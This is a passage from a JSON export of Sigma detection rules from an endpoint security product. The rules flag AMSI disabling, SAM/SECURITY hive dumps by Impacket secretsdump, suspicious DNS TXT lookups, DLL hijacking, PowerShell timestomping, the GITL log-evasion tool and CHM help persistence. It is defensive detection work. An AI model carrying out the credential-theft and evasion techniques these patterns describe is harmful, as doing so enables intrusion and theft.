"content": "title: Windows Scripts AMSI Disabled\nid: 90925be7-7d69-42de-a7d3-1aaf59bddb05\ndescription: |\n Detects the disabling of the Antimalware Scan Interface (AMSI) for Windows Scrips (VBA and JScript) through the registry.\n Attackers may want to disable the AMSI for Windows as a mean to evade security solutions.\n It is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as subsequent malicious JScript or VBA scripts execution.\nreferences:\n - https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf\ndate: 2020/10/05\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.AMSIBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Match on HKCU and HKLM here (HKLM is now used on newer version of Windows 10, used to be HKCU).\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable'\n\n filter_is_empty:\n Details:\n - ''\n - '(Empty)'\n\n condition: selection and not filter_is_empty\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90925be7-7d69-42de-a7d3-1aaf59bddb05",
"rule_name": "Windows Scripts AMSI Disabled",
"rule_description": "Detects the disabling of the Antimalware Scan Interface (AMSI) for Windows Scrips (VBA and JScript) through the registry.\nAttackers may want to disable the AMSI for Windows as a mean to evade security solutions.\nIt is recommended to analyze the process responsible for the registry edit to look for malicious content, as well as subsequent malicious JScript or VBA scripts execution.\n",
"rule_creation_date": "2020-10-05",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90acffa0-c732-46ee-84c6-fd4eafaad163",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628075Z",
"creation_date": "2026-03-23T11:45:34.628077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628081Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/fortra/impacket/blob/e692d9052fcba896f74fc60feb048c4666590003/impacket/examples/secretsdump.py#L919",
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_secretsdump_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry via Impacket Secretsdump\nid: 90acffa0-c732-46ee-84c6-fd4eafaad163\ndescription: |\n Detects a registry save to file operation of the SAM or SECURITY registry hives with a specific file path characteristic of Impacket's Secretsdump.py.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n Tools like Impacket's secretsdump.py can export these hives to steal credentials or manipulate security settings.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nreferences:\n - https://github.com/fortra/impacket/blob/e692d9052fcba896f74fc60feb048c4666590003/impacket/examples/secretsdump.py#L919\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/06/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.Framework.Impacket\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90acffa0-c732-46ee-84c6-fd4eafaad163",
"rule_name": "SAM or SECURITY Hives Dumped from Registry via Impacket Secretsdump",
"rule_description": "Detects a registry save to file operation of the SAM or SECURITY registry hives with a specific file path characteristic of Impacket's Secretsdump.py.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nTools like Impacket's secretsdump.py can export these hives to steal credentials or manipulate security settings.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n",
"rule_creation_date": "2024-06-10",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90c34db9-cb9c-454f-a5d1-d38abba9b4cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626399Z",
"creation_date": "2026-03-23T11:45:34.626401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626406Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_suspicious_txt_dns.yml",
"content": "title: Suspicious TXT DNS Resolution (Windows)\nid: 90c34db9-cb9c-454f-a5d1-d38abba9b4cc\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/03/28\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: \"?\"\n QueryName|contains: '.' # DNS domain MUST contains a ., otherwise it is a local name\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName|endswith:\n - '.local' # ignore local DNS\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - '._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.nos-avg.cz.' # Norton, Avast, AVG, ...\n - '.nos-avg.cz' # Norton, Avast, AVG, ...\n - '.logmein-gateway.com.'\n - '.logmein-gateway.com'\n - 'xmbc.highrez.co.uk' # some tool to manage mouse buttons\n - 'ingress.cloudflare-ipfs.com'\n - '.argotunnel.com' # Cloudflare tunnel client\n - '_dnsaddr.bootstrap.libp2p.io'\n - 'account.filemaker-cloud.com'\n - '.mongodb.net'\n - '.trellix.com' # McAfee\n - 'current.cvd.clamav.net.'\n - 'current.cvd.clamav.net'\n - 'push.apple.com'\n - '.kmaxcdn.com'\n - '.hotmail.com'\n - 'feed.snipaste.com'\n - '.gpsoft.com.au'\n - 'minatec.wisper.infra-??.cw-wisper.com'\n - 'releaseversion.ghisler.com'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_dnscache:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache'\n\n exclusion_svchost_sharedaccess:\n ProcessCommandLine: '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n\n exclusion_ipconfig:\n ProcessCommandLine: '?:\\windows\\System32\\ipconfig.exe /displaydns'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_torrent:\n ProcessDescription: 'µTorrent'\n ProcessSigned: 'true'\n ProcessSignature: 'BitTorrent Inc'\n\n exclusion_bravebrowser:\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n\n exclusion_bimi1:\n QueryName|contains: '._bimi.'\n QueryResults|contains|all:\n - '16 v=BIMI1;'\n - 'a=http'\n - 'l=http'\n\n exclusion_securitygateway:\n ProcessImage|endswith: '\\SecurityGateway\\App\\SecurityGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MDaemon Technologies, Ltd.'\n\n exclusion_gpsoft:\n ProcessImage|endswith: '\\DirectoryOpusPortable\\App\\Directory Opus\\dopus.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'GP Software (Redbrook Pty Ltd)'\n\n exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_dmarc:\n TextRecords|contains: 'ruf=mailto:'\n QueryName|contains: '_dmarc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90c34db9-cb9c-454f-a5d1-d38abba9b4cc",
"rule_name": "Suspicious TXT DNS Resolution (Windows)",
"rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n",
"rule_creation_date": "2024-03-28",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90c6740d-685d-400b-885f-04d7a447a338",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082673Z",
"creation_date": "2026-03-23T11:45:34.082676Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082680Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertieshardware.yml",
"content": "title: DLL Hijacking via systempropertieshardware.exe\nid: 90c6740d-685d-400b-885f-04d7a447a338\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertieshardware.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertieshardware.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90c6740d-685d-400b-885f-04d7a447a338",
"rule_name": "DLL Hijacking via systempropertieshardware.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertieshardware.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90ca0fdc-affa-4d5e-a5f1-ce8a843ed720",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620336Z",
"creation_date": "2026-03-23T11:45:34.620338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620342Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/revisiting-ttps-timestomper-622d4c28a655",
"https://github.com/guardicore/monkey/blob/release/1.13.0/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.ps1",
"https://github.com/mitre-attack/attack-arsenal/blob/c056b51942ffae1d0f3416cd14f14f8795d74c16/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1",
"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_powershell_timestomp.yml",
"content": "title: Possible Timestomp via PowerShell\nid: 90ca0fdc-affa-4d5e-a5f1-ce8a843ed720\ndescription: |\n Detects an attempt at timestomping via PowerShell.\n Timestomping consists in changing the modify file time attributes to hide changes to existing files.\n It is recommended to investigate the PowerShell script that performed the timestomp to look for other potential malicious actions.\nreferences:\n - https://posts.specterops.io/revisiting-ttps-timestomper-622d4c28a655\n - https://github.com/guardicore/monkey/blob/release/1.13.0/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.ps1\n - https://github.com/mitre-attack/attack-arsenal/blob/c056b51942ffae1d0f3416cd14f14f8795d74c16/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2022/01/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # Win32 APIs\n - 'SetFileTime'\n - 'SetFileInformationByHandle'\n - 'NtSetInformationFile'\n\n # PowerShell + .NET APIs\n - '.LastWriteTime='\n - '.LastWriteTime ='\n - 'SetLastAccessTime'\n - 'SetLastWriteTime'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_programfiles:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_fp:\n PowershellCommand|contains:\n - '([System.IO.FileInfo]$FilePath).LastWriteTime = [datetime]$UriLastModified'\n - '(Get-ChildItem -LiteralPath $path).LastWriteTime = Get-Date'\n\n # C:\\Program Files\\WindowsPowerShell\\Modules\\Posh-SSH\\3.0.1\\Posh-SSH.psm1\n exclusion_posh:\n PowershellCommand|contains:\n - 'if (Test-SFTPPath -SFTPSession $session -Path $Path)'\n - '$currentAttrib.LastWriteTime = $LastWriteTime'\n - '# .ExternalHelp Posh-SSH.psm1-Help.xml'\n - 'function New-SFTPSymlink'\n\n # https://github.com/romero126/PS1C/blob/master/example_provider.cs\n exclusion_ps1c:\n PowershellCommand|contains|all:\n - 'function PSSetFileMetadata'\n - '$item = Microsoft.PowerShell.Management\\get-item $metaDataFilePath -ea SilentlyContinue -Force'\n - 'if ($metaDataToSet[?LastWriteTimeUtc?])'\n - '$item.LastWriteTimeUtc = $metaDataToSet[?LastWriteTimeUtc?]'\n\n exclusion_eagetmail:\n PowershellCommand|contains|all:\n - 'Get-ChildItem $installPath -Include EAGetMail*.dll, EAGetMail*.winmd -recurse'\n - 'New-Item -Path $timeToInstall -ItemType file -Force -ErrorAction Ignore > $null'\n - 'If(Test-Path $timeToInstall -PathType Leaf){'\n\n exclusion_senseir1:\n ProcessParentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\\\*.ps1'\n\n exclusion_altiris:\n ProcessGrandparentImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n\n exclusion_defender:\n - ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\\\*\\\\*.ps1'\n\n exclusion_lgpn:\n ProcessCommandLine|startswith: 'powershell.exe -command import-module lgpn;'\n\n exclusion_novell:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\handlers\\runscriptenf.exe'\n\n exclusion_perl:\n ProcessParentImage: '?:\\WINAPP64\\Perl64\\bin\\perl.exe'\n\n exclusion_schedule:\n - ProcessParentImage:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n - ProcessGrandparentImage:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90ca0fdc-affa-4d5e-a5f1-ce8a843ed720",
"rule_name": "Possible Timestomp via PowerShell",
"rule_description": "Detects an attempt at timestomping via PowerShell.\nTimestomping consists in changing the modify file time attributes to hide changes to existing files.\nIt is recommended to investigate the PowerShell script that performed the timestomp to look for other potential malicious actions.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "910bcf36-de58-4e15-a006-15c66e7cab0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084141Z",
"creation_date": "2026-03-23T11:45:34.084143Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084148Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/bats3c/Ghost-In-The-Logs",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_launch_gitl.yml",
"content": "title: Ghost In The Logs (GITL) HackTool Executed\nid: 910bcf36-de58-4e15-a006-15c66e7cab0b\ndescription: |\n Detects the execution of Ghost In The Logs (GITL), a security evasion toolkit.\n GITL is a malicious tool specifically designed to bypass security monitoring by manipulating Sysmon configurations and Windows Event Logging. Attackers use it to hide their activities and maintain stealth during operations.\n It is recommended to investigate for signs of logging disruption, suspicious process creations, and verify the integrity of your logs.\nreferences:\n - https://github.com/bats3c/Ghost-In-The-Logs\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2021/04/08\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.GITL\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\gitl.exe'\n - OriginalFileName: 'gitl.exe'\n selection_cmd:\n - CommandLine|contains:\n - ' enable'\n - ' disable'\n - ' load'\n - ' clean'\n - ' status'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "910bcf36-de58-4e15-a006-15c66e7cab0b",
"rule_name": "Ghost In The Logs (GITL) HackTool Executed",
"rule_description": "Detects the execution of Ghost In The Logs (GITL), a security evasion toolkit.\nGITL is a malicious tool specifically designed to bypass security monitoring by manipulating Sysmon configurations and Windows Event Logging. Attackers use it to hide their activities and maintain stealth during operations.\nIt is recommended to investigate for signs of logging disruption, suspicious process creations, and verify the integrity of your logs.\n",
"rule_creation_date": "2021-04-08",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "910f6712-e34f-40b2-8fa7-0c1a7e4ca68f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072359Z",
"creation_date": "2026-03-23T11:45:34.072361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072366Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/htmlhelpauthor.html",
"https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_html_help_author.yml",
"content": "title: Possible HtmlHelp Author CHM Persistence Added\nid: 910f6712-e34f-40b2-8fa7-0c1a7e4ca68f\ndescription: |\n Detects the edition of the HtmlHelp Author registry key.\n This method is used as a means to achieve persistence by putting a malicious DLL as a .chm helper. The DLL is loaded when a .chm file is opened.\n It is recommended to create a File Acquisition job to download the DLL and analyze it for malicious behavior.\nreferences:\n - https://persistence-info.github.io/Data/htmlhelpauthor.html\n - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\HtmlHelp Author\\Location'\n\n is_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not is_empty\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "910f6712-e34f-40b2-8fa7-0c1a7e4ca68f",
"rule_name": "Possible HtmlHelp Author CHM Persistence Added",
"rule_description": "Detects the edition of the HtmlHelp Author registry key.\nThis method is used as a means to achieve persistence by putting a malicious DLL as a .chm helper. The DLL is loaded when a .chm file is opened.\nIt is recommended to create a File Acquisition job to download the DLL and analyze it for malicious behavior.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "911369b2-1f0e-4f72-bccf-22e1cf3fb1e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
